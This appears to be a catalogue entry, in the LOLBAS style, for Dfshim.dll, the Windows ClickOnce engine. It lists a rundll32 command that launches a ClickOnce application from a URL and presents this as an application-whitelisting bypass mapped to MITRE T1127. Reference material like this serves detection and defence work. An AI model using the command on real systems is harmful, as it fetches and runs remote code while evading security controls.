.. / Dfshim.dll
Star

ClickOnce engine in Windows used by .NET


Paths:

Resources:
Acknowledgements:

Detection:

AWL bypass

Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
Usecase: Use binary to bypass Application whitelisting
Privileges required: User
OS: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
MITRE ATT&CK®: T1127